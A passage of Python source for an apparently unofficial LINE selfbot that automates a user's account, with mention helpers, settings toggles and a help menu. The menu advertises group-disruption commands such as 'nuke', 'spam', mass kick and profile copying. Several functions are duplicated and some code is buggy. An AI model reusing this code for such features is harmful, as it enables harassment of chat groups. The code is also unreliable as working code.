"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"
],
"mimic": {
"copy": False,
"status": False,
"target": {}
}
}
wait = {
"Sider":{},
"limit": 1,
"Mute": False,
"unsend":True,
"timeline":False,
"selfbot":True,
"sukaPost":True,
"comment1":"» ʜᴇʏ, ɪᴍ ᴄᴏᴍᴍɪɴɢ 💃\n» ᴀᴜᴛᴏʟɪᴋᴇ ʙʏ: ᴛᴇᴀᴍ ᴅᴋᴢ ᴘʀᴏᴛᴇᴄᴛɪᴏɴ\n» ғᴀᴍɪʟʏ ʙᴏᴛs ᴘʀᴏᴛᴇᴄᴛ\n» ғᴀᴍɪʟʏ sᴇʟғʙᴏᴛ\n» ғᴀᴍɪʟʏ ᴊᴀᴠᴀsᴄʀɪғᴛ ʙᴏᴛ\n\n» ᴡᴇ ᴀʀᴇ ᴘʀᴏᴛᴇᴄᴛ ʏᴏᴜʀ ɢʀᴏᴜᴘ",
"welcomeOn":False,
"lang":"JP",
}
like = {
"like":True,
"likeOn":True,
"liked":True,
}
tikel = {
'sid':"48198",
'spkg':"2000000"
}
read = {
"readPoint": {},
"readMember": {},
"readTime": {},
"ROM": {}
}
myProfile = {
"displayName": "",
"statusMessage": "",
"pictureStatus": ""
}
cctv={
"cyduk":{},
"point":{},
"sidermem":{}
}
contact = line.getProfile()
mybackup = line.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
myProfile["displayName"] = lineProfile.displayName
myProfile["statusMessage"] = lineProfile.statusMessage
myProfile["pictureStatus"] = lineProfile.pictureStatus
#==============================================================================#
def restartBot():
print ("[ INFO ] BOT RESETTED")
time.sleep(3)
python = sys.executable
os.execl(python, python, *sys.argv)
def restart_program():
print ("[ INFO ] BOT RESETTED")
time.sleep(3)
python = sys.executable
os.execl(python, python, *sys.argv)
def sendMessageWithMention(to, mid):
try:
aa = '{"S":"0","E":"3","M":'+json.dumps(mid)+'}'
text_ = '@x '
line.sendMessage(to, text_, contentMetadata={'MENTION':'{"MENTIONEES":['+aa+']}'}, contentType=0)
except Exception as error:
logError(error)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d : Jam, ♪ %02d : Menit, ♪ %02d : Detik ♪' % (hours, mins, secs)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours,24)
weaks, days = divmod(days,7)
if days == 0:
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
elif days > 0 and weaks == 0:
return '%02d Hari %02d Jam %02d Menit %02d Detik' %(days, hours, mins, secs)
elif days > 0 and weaks > 0:
return '%02d Minggu %02d Hari %02d Jam %02d Menit %02d Detik' %(weaks, days, hours, mins, secs)
def a2():
now2 = datetime.datetime.now()
nowT = datetime.datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def sendMentionV2(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@zeroxyuuki "
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
line.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
def mentionMembers(to, mid):
try:
arrData = ""
textx = "❨✪❩ ᴅᴋᴢ mentions ❨✪❩ \n\n1. ".format(str(len(mid)))
textx2 ="╭════════════════╮\n ✍ ᴛᴏᴛᴀʟ {} ᴍᴇᴍʙᴇʀs".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\n╚══[ {} ]".format(str(line.getGroup(to).name))
except:
no = "\n╚══[ Success ]"
line.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
jp1 = line.getContact(lineMID).displayName
line.sendMessage(to, textx2 + "\n ✍ ᴍᴇɴᴛɪᴏɴᴇs ʙʏ : " + jp1 + "\n╰════════════════╯")
except Exception as error:
line.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def mentionMembers(to, mid):
try:
arrData = ""
textx = "╭════════════════╮\n ❨✪❩ ᴅᴋᴢ mentions ❨✪❩ \n║\n║◍ 1. ".format(str(len(mid)))
ginfo = line.getGroup(to)
arr = []
no = 1
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "║◍ {}. ".format(str(no))
else:
textx += "\n「 Total {} Member 」\n╰════════════════╯".format(str(len(mid)))
line.sendMessage(to, textx, {'AGENT_NAME':'「 Creator 」', 'AGENT_LINK': 'line://ti/p/~eg_2'.format(line.getProfile().userid), 'AGENT_ICON': "http://dl.profile.line-cdn.net/" + line.getProfile().picturePath, 'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
line.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMentionV2(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@jeck "
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mids")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + 15
arrData = {'S':str(slen), 'E':str(elen - 4), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
line.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
def sendMention(to, mid, firstmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x \n"
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
today = datetime.today()
future = datetime(2018,3,1)
hari = (str(future - today))
comma = hari.find(",")
hari = hari[:comma]
teman = line.getAllContactIds()
gid = line.getGroupIdsJoined()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
eltime = time.time() - mulai
bot = runtime(eltime)
text += mention+"◐ Jam : "+datetime.strftime(timeNow,'%H:%M:%S')+" Wib\n🔰 Group : "+str(len(gid))+"\n🔰 Teman : "+str(len(teman))+"\n🔰 Expired : In "+hari+"\n🔰 Version : Saints Bot\n🔰 Tanggal : "+datetime.strftime(timeNow,'%Y-%m-%d')+"\n🔰 Runtime : \n • "+bot
line.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
line.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def summon(to, nama):
aa = ""
bb = ""
strt = int(0)
akh = int(0)
nm = nama
myid = line.getProfile().mid
if myid in nm:
nm.remove(myid)
for mm in nm:
akh = akh + 6
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 7
akh = akh + 1
bb += "@nrik "
aa = (aa[:int(len(aa)-1)])
text = bb
try:
line.sendMessage(to, text, contentMetadata={'MENTION':'{"MENTIONEES":['+aa+']}'}, contentType=0)
except Exception as error:
print(error)
def restartBot():
print ("[ INFO ] BOT RESETTED")
time.sleep(3)
python = sys.executable
os.execl(python, python, *sys.argv)
def logError(text):
line.log("[ ERROR ] " + str(text))
time_ = datetime.now()
with open("errorLog.txt","a") as error:
error.write("\n[%s] %s" % (str(time), text))
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version:
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers = headers)
resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else:
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1:
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+1)
end_content = s.find(',"ow"',start_content+1)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item)
time.sleep(0.1)
page = page[end_content:]
return items
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
#time.sleep(0.1) #Timer could be used to slow down the request for#image downloads
page = page[end_content:]
return items
def cTime_to_datetime(unixtime):
return datetime.fromtimestamp(int(str(unixtime)[:len(str(unixtime))-3]))
def dt_to_str(dt):
return dt.strftime('%H:%M:%S')
#message.createdTime -> 00:00:00
def cTime_to_datetime(unixtime):
return datetime.fromtimestamp(int(str(unixtime)[:len(str(unixtime))-3]))
def dt_to_str(dt):
return dt.strftime('%H:%M:%S')
#delete log if pass more than 24 hours
def delete_log1():
ndt = datetime.now()
for data in msg_dict1:
if (datetime.utcnow() - cTime_to_datetime(msg_dict1[data]["createdTime"])) > datetime.timedelta(1):
del msg_dict1[msg_id]
def atend1():
print("Saving")
with open("Log_data.json","w",encoding='utf8') as f:
json.dump(msg_dict1, f, ensure_ascii=False, indent=4,separators=(',', ': '))
print("BYE")
#message.createdTime -> 00:00:00
def cTime_to_datetime(unixtime):
return datetime.fromtimestamp(int(str(unixtime)[:len(str(unixtime))-3]))
def dt_to_str(dt):
return dt.strftime('%H:%M:%S')
#delete log if pass more than 24 hours
def delete_log():
ndt = datetime.now()
for data in msg_dict:
if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > datetime.timedelta(1):
del msg_dict[msg_id]
def delete_log():
ndt = datetime.now()
for data in msg_dict:
if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > timedelta(1):
if "path" in msg_dict[data]:
line.deleteFile(msg_dict[data]["path"])
del msg_dict[data]
#atexit.register(atend)
def helpmessage():
helpMessage = """
╭═══════════════════╮
❨✪❩ ɢᴇɴᴇʀᴀʟ ᴄᴏᴍᴍᴀɴᴅ ❨✪❩
╰═══════════════════╯
01.║✍ ᴍᴇ
02.║✍ sᴘ
03.║✍ sᴇᴛ
04.║✍ ᴘᴘ
05.║✍ ɴᴋ:
06.║✍ ɢɪᴅ
07.║✍ ᴋɪᴄᴋ @
08.║✍ ᴠᴋɪᴄᴋ @
09.║✍ ɴᴜᴋᴇ
10.║✍ ɢᴜʀʟ
11.║✍ ʜᴇʟᴘ
12.║✍ ᴍɪᴅ
13.║✍ ᴍɪᴅ @
14.║✍ ᴍᴜsɪᴄ
15.║✍ ᴍᴏᴠɪᴇ
16.║✍ ʀᴇᴊᴇᴄᴛ
17.║✍ ᴄᴀɴᴄᴇʟ
18.║✍ ɢᴘɪᴄᴛ
19.║✍ ᴄᴏᴠᴇʀ
20.║✍ ᴘɪᴄᴛ @
21.║✍ ᴄᴏᴠᴇʀ @
22.║✍ ᴄᴏᴘʏ @
23.║✍ ɢᴄᴀʟʟ
24.║✍ sᴘᴀᴍ
25.║✍ ʙᴀᴄᴋᴜᴘ
26.║✍ ʏᴏᴜᴛᴜʙᴇ
27.║✍ ɪᴍᴀɢᴇ:
28.║✍ ɪɴsᴛᴀɢʀᴀᴍ
29.║✍ ᴋᴀʟᴋᴜʟᴀᴛᴏʀ
30.║✍ ʙʀᴏᴀᴅᴄᴀsᴛ
╭═══════════════════╮
❨✪❩ ʀᴇʟᴀᴛᴇᴅ ɢʀᴏᴜᴘ ❨✪❩
╰═══════════════════╯
31.║✍ ʀᴇʙᴏᴏᴛ
32.║✍ ʀᴜɴᴛɪᴍᴇ
33.║✍ ᴀʙᴏᴜᴛ
34.║✍ ᴄʀᴇᴀᴛᴏʀ
35.║✍ ᴍʏɴᴀᴍᴇ
36.║✍ ᴍʏʙɪᴏ
37.║✍ ᴍʏᴠɪᴅ
38.║✍ ɢᴇᴛʙɪᴏ @
39.║✍ ɢᴄʀᴇᴀᴛᴏʀ
40.║✍ ɢɴᴀᴍᴇ
41.║✍ ᴍᴇᴍʟɪsᴛ
42.║✍ ɢʀᴏᴜᴘs
43.║✍ ᴀᴜᴛᴏʟɪᴋᴇ
44.║✍ ʟɪɴᴋ ᴏɴ/ᴏғғ
45.║✍ ɢᴇᴛɴᴀᴍᴇ @
46.║✍ ᴜᴘᴅᴀᴛᴇ ᴘɪᴄᴛ
47.║✍ ɢᴇᴛ ᴄᴏɴᴛᴀᴄᴛ @
48.║✍ ʀᴇᴍᴏᴠᴇᴄʜᴀᴛ
49.║✍ ɢᴇᴛ ᴠɪᴅᴇᴏᴘʀᴏғɪʟᴇ
50.║✍ ᴜᴘᴅᴀᴛᴇ ᴘɪᴄᴛ ɢʀᴏᴜᴘ
51.║✍ ᴀʟʟsᴇᴛᴛɪɴɢs ᴍᴏᴅᴇ ᴏɴ
52.║✍ ᴀʟʟsᴇᴛᴛɪɴɢs ᴍᴏᴅᴇ ᴏғғ
53.║✍ ᴛᴀɢ /ʜɪ /ʜᴀɪ /ʜᴇᴍ /ᴅᴋᴢ
╭═══════════════════╮
❨✪❩ ᴍɪᴍɪᴄ ᴄᴏᴍᴍᴀɴᴅ ❨✪❩
╰═══════════════════╯
54.║✍ ᴍɪᴍɪᴄᴀᴅᴅ
55.║✍ ᴍɪᴍɪᴄᴅᴇʟ
56.║✍ ᴍɪᴍɪᴄʟɪsᴛ
57.║✍ ᴍɪᴍɪᴄ ᴏɴ/ᴏғғ
╭═══════════════════╮
❨✪❩ ᴍᴇᴅɪᴀ ᴄᴏᴍᴍᴀɴᴅ ❨✪❩
╰═══════════════════╯
58.║✍ ʟᴇᴅ (ᴛxᴛ)
59.║✍ ᴘᴏsᴛᴇʀ (ᴛxᴛ)
60.║✍ ғs (ᴛxᴛ)
61.║✍ ᴄᴏʙᴀ (ᴛxᴛ)
62.║✍ ᴀɴᴜ (ᴛxᴛ)
63.║✍ ᴍᴜsɪᴄ (ᴛxᴛ)
64.║✍ ᴋᴏɴᴛᴀᴋ ᴍᴇ
65.║✍ ɪɴғᴏ ᴍᴇ
66.║✍ sᴍᴜʟᴇ (ɪᴅsᴍᴜʟᴇ)
67.║✍ ᴄᴇᴋsᴍᴜʟᴇ (ɪᴅsᴍᴜʟᴇ)
╭═══════════════════╮
❨✪❩ sᴇᴛᴛɪɴɢ ɪɴ ʀᴇsᴘᴏɴ ❨✪❩
╰═══════════════════╯
68.║✍ sᴇᴛ ʀᴇsᴘᴏɴ1
69.║✍ ᴄᴇᴋ ʀᴇsᴘᴏɴ1
70.║✍ sᴇᴛ ʀᴇsᴘᴏɴ2
71.║✍ ᴄᴇᴋ ʀᴇsᴘᴏɴ2
72.║✍ sᴇᴛ ʀᴇsᴘᴏɴ3
73.║✍ ᴄᴇᴋ ʀᴇsᴘᴏɴ3
74.║✍ sᴇᴛ ʀᴇsᴘᴏɴᴘᴄ
75.║✍ ᴄᴇᴋ ʀᴇsᴘᴏɴᴘᴄ
76.║✍ sᴇᴛ ᴡᴇʟᴄᴏᴍᴇ
77.║✍ ᴄᴇᴋ ᴡᴇᴋᴄᴏᴍᴇ
78.║✍ sᴇᴛ ʟᴇᴀᴠᴇᴍsɢ
79.║✍ ᴄᴇᴋ ʟᴇᴀᴠᴇᴍsɢ
80.║✍ sᴇᴛ sɪᴅᴇʀᴛᴇxᴛ
81.║✍ ᴄᴇᴋ sɪᴅᴇʀᴛᴇxᴛ
82.║✍ sᴇᴛ ᴀᴜᴛᴏʟɪᴋᴇ
83.║✍ ᴄᴇᴋ ᴀᴜᴛᴏʟɪᴋᴇ
"""
return helpMessage
#==============================================================================#
def lineBot(op):
try:
if op.type == 0:
print ("[ 0 ] END OF OPERATION")
return
if op.type == 5:
print ("[ 5 ] NOTIFIED ADD CONTACT")
if settings["autoAdd"] == True:
line.sendMessage(op.param1, "ʜᴀʟʟᴏ {} ᴛx ғᴏʀ ᴀᴅᴅ ᴍᴇ\nʙʏ: ᴛᴇᴀᴍ ᴅᴋᴢ ᴘʀᴏᴛᴇᴄᴛɪᴏɴ ".format(str(line.getContact(op.param1).displayName)))
if op.type == 15:
print ("[ 15 ] MEMBER LEAVE GROUP")
if settings["leavemsg"] == True:
contact = line.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
text = "ɢᴏᴏᴅ ʙʏᴇ @!\n{}".format(str(settings["keluar"]))
sendMentionV2(op.param1, text, [op.param2])
line.sendImageWithURL(op.param1,image)
if op.type == 17:
if settings["welcomemsg"] == True:
if op.param2 in lineMID:
return
ginfo = line.getGroup(op.param1)
contact = line.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
summon(op.param1,[op.param2])
line.sendMessage(op.param1,"ʜᴀʟʟᴏ ☛ " + line.getContact(op.param2).displayName + "\nᴡᴇʟᴄᴏᴍᴇ ᴛᴏ ɢʀᴏᴜᴘ ☛ " + str(ginfo.name)+"\n"+(str(settings["welcome"])))
line.sendImageWithURL(op.param1,image)
print ("MEMBER JOIN THE GROUP")
if op.type == 5:
print ("[ 5 ] NOTIFIED AUTO BLOCK CONTACT")
if settings["autoblock"] == True:
line.sendMessage(op.param1, "Halo {} \nThank yah \nSory akun saya Autoblock ".format(str(line.getContact(op.param1).displayName)))
line.blockContact(op.param1)
if op.type == 13:
print ("[ 13 ] NOTIFIED INVITE GROUP")
group = line.getGroup(op.param1)
if settings["autoJoin"] == True:
line.acceptGroupInvitation(op.param1)
if op.type == 24:
print ("[ 24 ] NOTIFIED LEAVE ROOM")
if settings["autoLeave"] == True:
line.leaveRoom(op.param1)
if op.type == 25:
print ("[ 25 ] SEND MESSAGE")
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0:
if sender != line.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if msg.contentType == 0:
if text is None:
return
#==============================================================================#
elif text.lower() == 'help':
helpMessage = helpmessage()
jp1 = line.getContact(lineMID).displayName
line.sendMessage(to,str(helpMessage) + "╭════════════════════╮\n❨✪❩ ᴠɪᴇᴡ sᴇᴛᴛɪɴɢs = sᴇᴛ \n❨✪❩ ᴠɪᴇᴡ ɪɴғᴏ ʙᴏᴛ = ᴀʙᴏᴜᴛ \n❨✪❩ ʜᴇʟᴘᴍᴇssᴀɢᴇ ʙʏ : " + jp1+ "\n╰════════════════════╯\n ™ ᴛᴇᴀᴍ ᴅᴋᴢ ᴘʀᴏᴛᴇᴄᴛɪᴏɴ ™\n")
#==============================================================================#
elif text.lower() == 'speed' or text.lower() == 'sp':
line.sendMessage(to, "progres...")
line.sendMessage(to,str(time.time()/1000000000000.0)+" seconds")
elif text.lower() == 'reboot':
line.sendMessage(to, "I'II come back latter")
line.sendMessage(to, "Restarted done ♪")
restartBot()
elif text.lower() == 'runtime':
eltime = time.time() -mulai
van = "╭════════════════════╮\n Mybot sudah berjalan selama\n " +waktu(eltime)+"\n╰════════════════════╯"
line.sendMessage(to,van)
elif text.lower() == 'about':
try:
arr = []
owner = "u9922f516e7fac1ea266f55a148e76217"
creator = line.getContact(owner)
contact = line.getContact(lineMID)
grouplist = line.getGroupIdsJoined()
contactlist = line.getAllContactIds()
blockedlist = line.getBlockedContactIds()
ret_ = "____________________________\n❨✪❩ Impormation Selfbot ❨✪❩\n____________________________"
ret_ += "\n┃❨✪❩ Line Name : {}".format(contact.displayName)
ret_ += "\n┃❨✪❩ Groups : {}".format(str(len(grouplist)))
ret_ += "\n┃❨✪❩ Friends : {}".format(str(len(contactlist)))
ret_ += "\n┃❨✪❩ Blocked : {}".format(str(len(blockedlist)))
ret_ += "\n┃❨✪❩ Version1 : Python3 Update"
ret_ += "\n┃❨✪❩ Version2 : Premium server"
ret_ += "\n┃❨✪❩ Server : Gnu Linux 48"
ret_ += "\n┃❨✪❩ Masa Aktif : 28-09-2018"
ret_ += "\n┃❨✪❩ Creator : {}".format(creator.displayName)
ret_ += "\n____________________________"
line.sendMessage(to, str(ret_))
except Exception as e:
line.sendMessage(msg.to, str(e))
#==============================================================================#
elif text.lower() == 'set' or text.lower() == 'myset':
try:
ret_ = "╭═════════════════╮\n"
ret_ += " ❨✪❩ sᴇᴛᴛɪɴɢs ᴍʏʙᴏᴛ ❨✪❩\n"
ret_ += "╰═════════════════╯\n"
if settings["autoAdd"] == True: ret_ += "01.┃ᴀᴜᴛᴏᴀᴅᴅ ᴏɴ \n"
else: ret_ += "01.┃ᴀᴜᴛᴏᴀᴅᴅ ᴏғғ \n"
if settings["autoblock"] == True: ret_ += "02.┃ᴀᴜᴛᴏʙʟᴏᴄᴋ ᴏɴ \n"
else: ret_ += "02.┃ᴀᴜᴛᴏʙʟᴏᴄᴋ ᴏғғ \n"
if settings["contact"] == True: ret_ += "03.┃ᴄᴏɴᴛᴀᴄᴛ ᴏɴ \n"
else: ret_ += "03.┃ᴄᴏɴᴛᴀᴄᴛ ᴏғғ \n"
if settings["autoJoin"] == True: ret_ += "04.┃ᴀᴜᴛᴏᴊᴏɪɴ ᴏɴ \n"
else: ret_ += "04.┃ᴀᴜᴛᴏᴊᴏɪɴ ᴏғғ \n"
if settings["mimic"]["status"] == True: ret_ += "05.┃ᴍɪᴍɪᴄ ᴏɴ \n"
else: ret_ += "05.┃ᴍɪᴍɪᴄ ᴏғғ \n"
if settings["welcomemsg"] == True: ret_+= "06.┃ᴡᴇʟᴄᴏᴍᴇ ᴏɴ \n"
else: ret_ +="06.┃ᴡᴇʟᴄᴏᴍᴇ ᴏғғ \n"
if settings["leavemsg"] == True: ret_+= "07.┃ʟᴇᴀᴠᴇᴍsɢ ᴏɴ \n"
else: ret_ +="07.┃ʟᴇᴀᴠᴇᴍsɢ ᴏғғ \n"
if settings["autoLeave"] == True: ret_ += "08.┃ᴀᴜᴛᴏʟᴇᴀᴠᴇ ᴏɴ \n"
else: ret_ += "08.┃ᴀᴜᴛᴏʟᴇᴀᴠᴇ ᴏғғ \n"
if settings["autoRead"] == True: ret_ += "09.┃ᴀᴜᴛᴏʀᴇᴀᴅ ᴏɴ \n"
else: ret_ += "09.┃ᴀᴜᴛᴏʀᴇᴀᴅ ᴏғғ \n"
if settings["checkSticker"] == True: ret_ += "10.┃ᴄᴇᴋsᴛɪᴄᴋᴇʀ ᴏɴ \n"
else: ret_ += "10.┃ᴄᴇᴋsᴛɪᴄᴋᴇʀ ᴏғғ \n"
if settings["autoRespon"] == True: ret_ += "11.┃ʀᴇsᴘᴏɴ1 ᴏɴ \n"
else: ret_ += "11.┃ʀᴇsᴘᴏɴ1 ᴏғғ \n"
if settings["autoResponImage"] == True: ret_ += "12.┃ʀᴇsᴘᴏɴ2 ᴏɴ \n"
else: ret_ += "12.┃ʀᴇsᴘᴏɴ2 ᴏғғ \n"
if settings["autoResponPm"] == True: ret_ += "13.┃ʀᴇsᴘᴏɴ3 ᴏɴ \n"
else: ret_ += "13.┃ʀᴇsᴘᴏɴ3 ᴏғғ \n"
if settings["responPc"] == True: ret_ += "14.┃ʀᴇsᴘᴏɴᴘᴄ ᴏɴ \n"
else: ret_ += "14.┃ʀᴇsᴘᴏɴᴘᴄ ᴏғғ \n"
if settings["protect"] == True: ret_ += "15.┃ᴘʀᴏᴛᴇᴄᴛ ᴏɴ \n"
else: ret_ += "15.┃ᴘʀᴏᴛᴇᴄᴛ ᴏғғ \n"
if settings["qrprotect"] == True: ret_ += "16.┃ʟɪɴᴋᴘʀᴏᴛᴇᴄᴛ ᴏɴ \n"
else: ret_ += "16.┃ʟɪɴᴋᴘʀᴏᴛᴇᴄᴛ ᴏғғ \n"
if settings["autorejc"] == True: ret_ += "17.┃ᴀᴜᴛᴏʀᴇᴊᴇᴄᴛ ᴏɴ \n"
else: ret_ += "17.┃ᴀᴜᴛᴏʀᴇᴊᴇᴄᴛ ᴏғғ \n"
if settings["autoKick"] == True: ret_ += "18.┃ᴀᴜᴛᴏᴋɪᴄᴋ ᴏɴ \n"
else: ret_ += "18.┃ᴀᴜᴛᴏᴋɪᴄᴋ ᴏғғ \n"
ret_ += "╭═════════════════╮"
jp = line.getContact(lineMID).displayName
line.sendMessage(to, str(ret_)+"\n ❨✪❩ ʟɪɴᴇ ɴᴀᴍᴇ : "+jp+"\n ❨✪❩ ᴅᴋᴢ ᴘʀᴏᴛᴇᴄᴛɪᴏɴ ❨✪❩\n╰═════════════════╯")
except Exception as e:
line.sendMessage(msg.to, str(e))
elif text.lower() == 'allsettings mode on':
settings["autoAdd"] = True
settings["autoblock"] = True
settings["contact"] = True
settings["autoJoin"] = True
settings["mimic"]["status"] = True
settings["welcomemsg"] = True
settings["leavemsg"] = True
settings["autoLeave"] = True
settings["autoRead"] = True
settings["checkSticker"] = True
settings["autoRespon"] = True
settings["autoResponImage"] = True
settings["autoResponPm"] = True
settings["responPc"] = True
settings["protect"] = True
settings["qrprotect"] = True
settings["autorejc"] = True
settings["autoKick"] = True
line.sendMessage(to, "All Setting Bot Mode On")
elif text.lower() == 'allsettings mode off':
settings["autoAdd"] = False
settings["autoblock"] = False
settings["contact"] = False
settings["autoJoin"] = False
settings["mimic"]["status"] = False
settings["welcomemsg"] = False
settings["leavemsg"] = False
settings["autoLeave"] = False
settings["autoRead"] = False
settings["checkSticker"] = False
settings["autoRespon"] = False
settings["autoResponImage"] = False
settings["autoResponPm"] = False
settings["responPc"] = False
settings["protect"] = False
settings["qrprotect"] = False
settings["autorejc"] = False
settings["autoKick"] = False
line.sendMessage(to, "All Setting Bot Mode Off")
elif text.lower() == 'clear ban':
line.sendMessage(to, "Removed banlist success")
elif text.lower() == 'autoadd on':
settings["autoAdd"] = True
line.sendMessage(to, "AutoAdd already On")
elif text.lower() == 'autoadd off':
settings["autoAdd"] = False
line.sendMessage(to, "AutoAdd already Off")
elif text.lower() == 'autoblock on':
settings["autoblock"] = True
line.sendMessage(to, "AutoBlock already On")
elif text.lower() == 'autoblock off':
settings["autoblock"] = False
line.sendMessage(to, "AutoBlock already Off")
elif text.lower() == 'autojoin on':
settings["autoJoin"] = True
line.sendMessage(to, "AutoJoin already On")
elif text.lower() == 'autojoin off':
settings["autoJoin"] = False
line.sendMessage(to, "AutoJoin already Off")
elif text.lower() == 'autoleave on':
settings["autoLeave"] = True
line.sendMessage(to, "AutoLeave already On")
elif text.lower() == 'autoleave off':
settings["autoLeave"] = False
line.sendMessage(to, "AutoLeave already Off")
elif text.lower() == 'autoread on':
settings["autoRead"] = True
line.sendMessage(to, "Autoread Chat already On")
elif text.lower() == 'autoread off':
settings["autoRead"] = False
line.sendMessage(to, "Autoread Chat already Off")
elif text.lower() == 'ceksticker on':
settings["checkSticker"] = True
line.sendMessage(to, "CekStiker already On")
elif text.lower() == 'ceksticker off':
settings["checkSticker"] = False
line.sendMessage(to, "CekStiker already Off")
elif text.lower() == 'autokick on':
if sender in lineMID:
settings["autoKick"] = True
line.sendMessage(to, "AutoKick Di Aktifkan")
elif text.lower() == 'autokick off':
if sender in lineMID:
settings["autoKick"] = False
line.sendMessage(to, "AutoKick Turned Off")
elif text.lower() == 'respon1 on':
if sender in lineMID:
settings["autoRespon"] = True
line.sendMessage(to, "Autorespon1 Text di Aktifkan")
elif text.lower() == 'respon1 off':
if sender in lineMID:
settings["autoRespon"] = False
line.sendMessage(to, "Autorespon1 Text Off")
elif text.lower() == 'respon2 on':
if sender in lineMID:
settings["autoResponImage"] = True
line.sendMessage(to, "Autorespon2 TagImage di Aktifkan")
elif text.lower() == 'respon2 off':
if sender in lineMID:
settings["autoResponImage"] = False
line.sendMessage(to, "Autorespon2 Image Off")
elif text.lower() == 'respon3 on':
if sender in lineMID:
settings["autoResponPm"] = True
line.sendMessage(to, "Autorespon3 PM di Aktifkan")
elif text.lower() == 'respon3 off':
if sender in lineMID:
settings["autoResponPm"] = False
line.sendMessage(to, "Autorespon3 PM Off")
elif text.lower() == 'responpc on':
if sender in lineMID:
settings["responPc"] = True
line.sendMessage(to, "Autorespon Tagpc di Aktifkan")
elif text.lower() == 'responpc off':
if sender in lineMID:
settings["responPc"] = False
line.sendMessage(to, "Autorespon Tagpc Off")
elif text.lower() == 'protect on':
if sender in lineMID:
if settings["protect"] == True:
if settings["lang"] == "JP":
line.sendMessage(to," Protection Already On")
else:
line.sendMessage(to,"Protection Already On")
else:
settings["protect"] = True
if settings["lang"] == "JP":
line.sendMessage(to,"Protection Already On")
else:
line.sendMessage(to,"Protection Already On")
elif text.lower() == 'protect off':
if sender in lineMID:
if settings["protect"] == False:
if settings["lang"] == "JP":
